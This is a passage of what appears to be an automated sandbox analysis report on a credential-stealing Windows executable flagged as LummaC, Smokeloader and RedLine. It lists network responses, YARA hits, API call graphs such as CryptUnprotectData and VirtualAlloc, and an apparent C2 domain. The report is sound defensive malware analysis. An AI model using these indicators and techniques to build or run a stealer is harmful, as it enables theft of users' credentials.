                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                        CF-RAY: 8f90639358167292-EWR
                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1952&min_rtt=1943&rtt_var=747&sent=15&recv=25&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21198&delivery_rate=1447694&cwnd=252&unsent_bytes=0&cid=46cb83214ceeec6a&ts=946&x=0"
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                                        Start time:04:05:11
                                                                                                                                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\MPgkx6bQIQ.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\MPgkx6bQIQ.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                        File size:375'296 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:1663E17268AE9D60DD70AE27B8EA43AB
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1514080921.0000000003047000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1430582996.00000000024D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1693514918.00000000008E9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                                        Start time:04:05:30
                                                                                                                                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 1760
                                                                                                                                                                                                                                                                                        Imagebase:0xd70000
                                                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                          Execution Coverage:3.7%
                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:19%
                                                                                                                                                                                                                                                                                          Signature Coverage:62.6%
                                                                                                                                                                                                                                                                                          Total number of Nodes:147
                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:12
                                                                                                                                                                                                                                                                                          execution_graph 26375 4156a0 26377 4156a5 26375->26377 26376 4156fe 26379 415b79 26376->26379 26385 415948 CryptUnprotectData 26376->26385 26377->26376 26392 43a9b0 LdrInitializeThunk 26377->26392 26380 415c0b 26379->26380 26381 415ef8 26379->26381 26384 415ca6 26379->26384 26386 415cd0 26379->26386 26393 41bea0 26380->26393 26382 41bea0 LdrInitializeThunk 26381->26382 26382->26384 26385->26376 26385->26379 26386->26381 26386->26384 26388 43cb20 26386->26388 26389 43cb40 26388->26389 26390 43cc5e 26389->26390 26406 43a9b0 LdrInitializeThunk 26389->26406 26390->26386 26392->26376 26394 41bf0b 26393->26394 26395 41bec4 26393->26395 26394->26384 26395->26394 26395->26395 26407 414070 LdrInitializeThunk 26395->26407 26406->26390 26408 4210e0 26421 43c9a0 26408->26421 26410 421832 26411 421123 26411->26410 26419 4211d2 26411->26419 26425 43a9b0 LdrInitializeThunk 26411->26425 26413 438e70 RtlFreeHeap 26414 4217ca 26413->26414 26414->26410 26427 43a9b0 LdrInitializeThunk 26414->26427 26416 4217af 26416->26413 26417 4218a0 26416->26417 26419->26416 26420 438e70 RtlFreeHeap 26419->26420 26426 43a9b0 LdrInitializeThunk 26419->26426 26420->26419 26422 43c9c0 26421->26422 26422->26422 26423 43cace 26422->26423 26428 43a9b0 LdrInitializeThunk 26422->26428 26423->26411 26425->26411 26426->26419 26427->26414 26428->26423 26429 43cd60 26430 43cd80 26429->26430 26430->26430 26433 43cdbe 26430->26433 26435 43a9b0 LdrInitializeThunk 26430->26435 26432 43ce3e 26433->26432 26436 43a9b0 LdrInitializeThunk 26433->26436 26435->26433 26436->26432 26305 43b545 26306 43b570 26305->26306 26306->26306 26307 43b5ee 26306->26307 26309 43a9b0 LdrInitializeThunk 26306->26309 26309->26307 26310 40e648 CoInitializeSecurity 26437 43b068 26438 43b080 26437->26438 26441 43b16e 26438->26441 26443 43a9b0 LdrInitializeThunk 26438->26443 26440 43b23f 26440->26440 26441->26440 26444 43a9b0 LdrInitializeThunk 26441->26444 26443->26441 26444->26440 26311 40b44c 26315 40b45a 26311->26315 26316 40b57c 26311->26316 26312 40b65c 26314 43a950 2 API calls 26312->26314 26314->26316 26315->26312 26315->26316 26317 43a950 26315->26317 26318 43a976 26317->26318 26319 43a995 26317->26319 26320 43a98a 26317->26320 26321 43a968 26317->26321 26323 43a97b RtlReAllocateHeap 26318->26323 26324 438e70 26319->26324 26320->26312 26321->26318 26321->26319 26323->26320 26325 438e94 26324->26325 26326 438e83 26324->26326 26325->26320 26327 438e88 RtlFreeHeap 26326->26327 26327->26325 26328 43aecc 26330 43af00 26328->26330 26329 43af7e 26330->26329 26332 43a9b0 LdrInitializeThunk 26330->26332 26332->26329 26333 408790 26335 40879f 26333->26335 26334 408970 ExitProcess 26335->26334 26336 4087b4 GetCurrentProcessId GetCurrentThreadId 26335->26336 26337 408966 26335->26337 26338 4087da 26336->26338 26339 4087de SHGetSpecialFolderPathW GetForegroundWindow 26336->26339 26337->26334 26338->26339 26340 40887a 26339->26340 26340->26337 26341 8e985e 26342 8e986d 26341->26342 26345 8e9aee 26342->26345 26346 8e9afd 26345->26346 26349 8ea28e 26346->26349 26350 8ea2a9 26349->26350 26351 8ea2b2 CreateToolhelp32Snapshot 26350->26351 26352 8ea2ce Module32First 26350->26352 26351->26350 26351->26352 26353 8ea2dd 26352->26353 26354 8e9aed 26352->26354 26356 8e9f4d 26353->26356 26357 8e9f78 26356->26357 26358 8e9f89 VirtualAlloc 26357->26358 26359 8e9fc1 26357->26359 26358->26359 26359->26359 26360 40ea11 CoInitializeEx CoInitializeEx 26361 438e51 RtlAllocateHeap 26362 43ab91 26363 43ab9a GetForegroundWindow 26362->26363 26364 43abad 26363->26364 26445 420b30 26446 420b44 26445->26446 26449 420c51 26445->26449 26451 420c70 26446->26451 26452 420c80 26451->26452 26452->26452 26453 43cb20 LdrInitializeThunk 26452->26453 26454 420d8f 26453->26454 26455 40cff3 26456 40d010 26455->26456 26459 4361e0 26456->26459 26458 40d053 26458->26458 26460 436210 CoCreateInstance 26459->26460 26462 4367c2 26460->26462 26463 43641c SysAllocString 26460->26463 26464 4367d2 GetVolumeInformationW 26462->26464 26466 43648d 26463->26466 26467 4367f0 26464->26467 26468 4367b2 SysFreeString 26466->26468 26469 436495 CoSetProxyBlanket 26466->26469 26467->26458 26468->26462 26470 4364b5 SysAllocString 26469->26470 26471 4367a8 26469->26471 26473 436580 26470->26473 26471->26468 26473->26473 26474 43659c SysAllocString 26473->26474 26476 4365c3 26474->26476 26475 436796 SysFreeString SysFreeString 26475->26471 26476->26475 26477 436785 26476->26477 26478 43660e VariantInit 26476->26478 26477->26475 26480 436660 26478->26480 26479 436774 VariantClear 26479->26477 26480->26479 26486 248003c 26487 2480049 26486->26487 26501 2480e0f SetErrorMode SetErrorMode 26487->26501 26492 2480265 26493 24802ce VirtualProtect 26492->26493 26495 248030b 26493->26495 26494 2480439 VirtualFree 26499 24804be 26494->26499 26500 24805f4 LoadLibraryA 26494->26500 26495->26494 26496 24804e3 LoadLibraryA 26496->26499 26498 24808c7 26499->26496 26499->26500 26500->26498 26502 2480223 26501->26502 26503 2480d90 26502->26503 26504 2480dad 26503->26504 26505 2480dbb GetPEB 26504->26505 26506 2480238 VirtualAlloc 26504->26506 26505->26506 26506->26492 26370 40d696 26371 40d6f0 26370->26371 26372 40d73e 26371->26372 26374 43a9b0 LdrInitializeThunk 26371->26374 26374->26372

                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                          Function 004361E0 Relevance: 33.9, APIs: 11, Strings: 8, Instructions: 636memorycomCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 0 4361e0-436202 1 436210-436222 0->1 1->1 2 436224-436235 1->2 3 436240-436272 2->3 3->3 4 436274-4362b1 3->4 5 4362c0-436342 4->5 5->5 6 436348-436367 5->6 8 436374-43637f 6->8 9 436369 6->9 10 436380-4363bd 8->10 9->8 10->10 11 4363bf-436416 CoCreateInstance 10->11 12 4367c2-4367ee call 43c280 GetVolumeInformationW 11->12 13 43641c-43644f 11->13 18 4367f0-4367f4 12->18 19 4367f8-4367fa 12->19 15 436450-436463 13->15 15->15 17 436465-43648f SysAllocString 15->17 24 4367b2-4367be SysFreeString 17->24 25 436495-4364af CoSetProxyBlanket 17->25 18->19 20 436817-43681e 19->20 22 436820-436827 20->22 23 436837-43684f 20->23 22->23 26 436829-436835 22->26 27 436850-436862 23->27 24->12 28 4364b5-4364ca 25->28 29 4367a8-4367ae 25->29 26->23 27->27 30 436864-4368a8 27->30 31 4364d0-4364f4 28->31 29->24 33 4368b0-43692d 30->33 31->31 32 4364f6-436576 SysAllocString 31->32 34 436580-43659a 32->34 33->33 35 43692f-43696a call 41dd50 33->35 34->34 36 43659c-4365cc SysAllocString 34->36 39 436970-436978 35->39 42 4365d2-4365f4 36->42 43 436796-4367a6 SysFreeString * 2 36->43 39->39 41 43697a-43697c 39->41 44 436982-436992 call 407fe0 41->44 45 436800-436811 41->45 50 4365fa-4365fd 42->50 51 43678c-436792 42->51 43->29 44->45 45->20 47 436997-43699e 45->47 50->51 52 436603-436608 50->52 51->43 52->51 53 43660e-436656 VariantInit 52->53 54 436660-436690 53->54 54->54 55 436692-4366a4 54->55 56 4366a8-4366aa 55->56 57 4366b0-4366b6 56->57 58 436774-436785 VariantClear 56->58 57->58 59 4366bc-4366ca 57->59 58->51 60 43670d 59->60 61 4366cc-4366d1 59->61 64 43670f-436737 call 407f60 call 408d90 60->64 63 4366ec-4366f0 61->63 65 4366f2-4366fb 63->65 66 4366e0 63->66 75 436739 64->75 76 43673e-43674a 64->76 69 436702-436706 65->69 70 4366fd-436700 65->70 68 4366e1-4366ea 66->68 68->63 68->64 69->68 72 436708-43670b 69->72 70->68 72->68 75->76 77 436751-436771 call 407f90 call 407f70 76->77 78 43674c 76->78 77->58 78->77
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
                                                                                                                                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(w!s#), ref: 004364FB
                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(A3q5), ref: 004365A1
                                                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00436613
                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00436775
                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004367A0
                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004367A6
                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 004367B3
                                                                                                                                                                                                                                                                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004367E7
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                                                                                                                                                                                          • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                                                                                                                                                                                                                                                          • API String ID: 2573436264-4124187736
                                                                                                                                                                                                                                                                                          • Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                                                          • Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A
                                                                                                                                                                                                                                                                                          Function 00415298 Relevance: 9.9, APIs: 1, Strings: 4, Instructions: 1123COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: in~x$kmbj$ydij$Z\
                                                                                                                                                                                                                                                                                          • API String ID: 0-979945983
                                                                                                                                                                                                                                                                                          • Opcode ID: 26ca6100dcfc97b8c0c6fbf8c4ee366fc87c8afe50c98e0e46493e49499a4975
                                                                                                                                                                                                                                                                                          • Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26ca6100dcfc97b8c0c6fbf8c4ee366fc87c8afe50c98e0e46493e49499a4975
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55
                                                                                                                                                                                                                                                                                          Function 004210E0 Relevance: 8.0, Strings: 6, Instructions: 536COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 413 4210e0-421128 call 43c9a0 416 42112e-421190 call 414040 call 438e30 413->416 417 42188f-42189f 413->417 423 421192-421195 416->423 424 421197-4211bd 423->424 425 4211bf-4211c3 423->425 424->423 426 4211c5-4211d0 425->426 427 4211d2 426->427 428 4211d7-4211f0 426->428 429 42128f-421292 427->429 430 4211f2 428->430 431 4211f7-421202 428->431 432 421296-42129b 429->432 433 421294 429->433 434 42127e-421283 430->434 431->434 435 421204-421274 call 43a9b0 431->435 438 4212a1-4212b1 432->438 439 4217be-4217f3 call 438e70 432->439 433->432 436 421287-42128a 434->436 437 421285 434->437 443 421279 435->443 436->426 437->429 441 4212b3-4212e1 438->441 449 4217f5-4217f8 439->449 444 4212e7-421306 441->444 445 421499-42149d 441->445 443->434 448 421308-42130b 444->448 447 42149f-4214a2 445->447 450 4214a4-4214a8 447->450 451 4214aa-4214bb call 438e30 447->451 452 421367-421383 call 4218a0 448->452 453 42130d-421365 448->453 454 421822-421828 449->454 455 4217fa-421820 449->455 456 4214cf-4214d1 450->456 471 4214cb-4214cd 451->471 472 4214bd-4214c6 451->472 452->445 474 421389-4213b2 452->474 453->448 459 42182a-421830 454->459 455->449 463 4214d7-4214f6 456->463 464 42178c-421791 456->464 460 421832 459->460 461 421834-421846 459->461 466 42188d 460->466 469 42184a-421850 461->469 470 421848 461->470 473 4214f8-4214fb 463->473 467 421793-42179b 464->467 468 42179d-4217a1 464->468 466->417 475 4217a3 467->475 468->475 476 421878-42187b 469->476 477 421852-421874 call 43a9b0 469->477 470->476 471->456 478 4217a5-4217a9 472->478 479 421535-421570 473->479 480 4214fd-421533 473->480 481 4213b4-4213b7 474->481 475->478 486 42187f-42188b 476->486 487 42187d 476->487 477->476 478->441 485 4217af-4217b4 478->485 488 421572-421575 479->488 480->473 482 4213b9-4213da 481->482 483 4213dc-4213f7 call 4218a0 481->483 482->481 500 421402-421419 483->500 501 4213f9-4213fd 483->501 496 4218a0-4218b4 485->496 497 4217ba-4217bc 485->497 486->459 487->466 492 421577-42159d 488->492 493 42159f-4215ad 488->493 492->488 494 4215b1-4215bc 493->494 498 4215c3-4215e0 494->498 499 4215be 494->499 503 4218c0-4218c2 496->503 497->439 505 4215e2-4215e6 498->505 506 4215eb-4215fc 498->506 504 42169e-4216a1 499->504 507 42141b 500->507 508 42141d-421497 call 407f60 call 413c70 call 407f70 500->508 501->447 509 4218c4-4218cf 503->509 510 4218dc-4218e0 503->510 516 4216a3-4216aa 504->516 517 4216ae-4216cd 504->517 511 42168d-421692 505->511 506->511 512 421602-42167c call 43a9b0 506->512 507->508 508->447 514 4218d1-4218d4 509->514 515 4218d8-4218da 509->515 520 421696-421699 511->520 521 421694 511->521 526 421681-421688 512->526 514->503 522 4218d6 514->522 515->510 516->517 523 4216cf-4216d2 517->523 520->494 521->504 522->510 524 4216d4-42171b 523->524 525 42171d-42172d 523->525 524->523 528 421767-42176a 525->528 529 42172f-421733 525->529 526->511 532 42177b-42177d 528->532 533 42176c-421779 call 438e70 528->533 531 421735-42173c 529->531 534 42173e-42174a 531->534 535 42174c-421759 531->535 538 42177f-421782 532->538 533->538 534->531 539 42175b 535->539 540 42175d 535->540 538->464 543 421784-42178a 538->543 544 421763-421765 539->544 540->544 543->478 544->528
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: !@$,$T$U$V$h
                                                                                                                                                                                                                                                                                          • API String ID: 0-1072848446
                                                                                                                                                                                                                                                                                          • Opcode ID: 1b37148a9dca08e68feec6fc32ee7d5c05668dd5b0338c2dc7096b623dae1273
                                                                                                                                                                                                                                                                                          • Instruction ID: 7f4f8c271271a0ee30063bf5d57d9afa0b4a7bb7edff0777766b2e5d54dfe869
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b37148a9dca08e68feec6fc32ee7d5c05668dd5b0338c2dc7096b623dae1273
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF22E17160C3A08FD320DF28D44436FBBE1ABD6314F598A2EE5D9873A1D77988458B4B
                                                                                                                                                                                                                                                                                          Function 0040CFF3 Relevance: 7.8, Strings: 6, Instructions: 291COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 547 40cff3-40d003 548 40d010-40d03a 547->548 548->548 549 40d03c-40d06f call 408660 call 4361e0 548->549 554 40d070-40d0b1 549->554 554->554 555 40d0b3-40d0ff 554->555 556 40d100-40d157 555->556 556->556 557 40d159-40d163 556->557 558 40d165-40d168 557->558 559 40d17b-40d189 557->559 560 40d170-40d179 558->560 561 40d18b-40d18f 559->561 562 40d19d 559->562 560->559 560->560 563 40d190-40d199 561->563 564 40d1a0-40d1a8 562->564 563->563 565 40d19b 563->565 566 40d1aa-40d1ab 564->566 567 40d1bb-40d1c9 564->567 565->564 570 40d1b0-40d1b9 566->570 568 40d1db-40d29f 567->568 569 40d1cb-40d1cf 567->569 572 40d2a0-40d2e3 568->572 571 40d1d0-40d1d9 569->571 570->567 570->570 571->568 571->571 572->572 573 40d2e5-40d2fe 572->573 574 40d300-40d330 573->574 574->574 575 40d332-40d34f call 40ba00 574->575 577 40d354-40d36e 575->577
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: 7605F6E83C1F4941F9F1B7136A1E0C5E$BI$ZG$lev-tolstoi.com$3ej$pr
                                                                                                                                                                                                                                                                                          • API String ID: 0-2650674121
                                                                                                                                                                                                                                                                                          • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                                          • Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54
                                                                                                                                                                                                                                                                                          Function 00408790 Relevance: 7.6, APIs: 5, Instructions: 146threadCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 578 408790-4087a1 call 43a360 581 408970-408972 ExitProcess 578->581 582 4087a7-4087ae call 4336c0 578->582 585 4087b4-4087d8 GetCurrentProcessId GetCurrentThreadId 582->585 586 40896b call 43a930 582->586 588 4087da-4087dc 585->588 589 4087de-408878 SHGetSpecialFolderPathW GetForegroundWindow 585->589 586->581 588->589 590 4088f3-40895f call 409bc0 589->590 591 40887a-4088f1 589->591 590->586 594 408961 call 40cb90 590->594 591->590 596 408966 call 40b9d0 594->596 596->586
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004087B4
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004087BE
                                                                                                                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00408870
                                                                                                                                                                                                                                                                                            • Part of subcall function 0040B9D0: FreeLibrary.KERNEL32(0040896B), ref: 0040B9D6
                                                                                                                                                                                                                                                                                            • Part of subcall function 0040B9D0: FreeLibrary.KERNEL32 ref: 0040B9F7
                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00408972
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3676751680-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                                          • Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5
                                                                                                                                                                                                                                                                                          Function 0041BEA0 Relevance: 6.9, Strings: 5, Instructions: 684COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
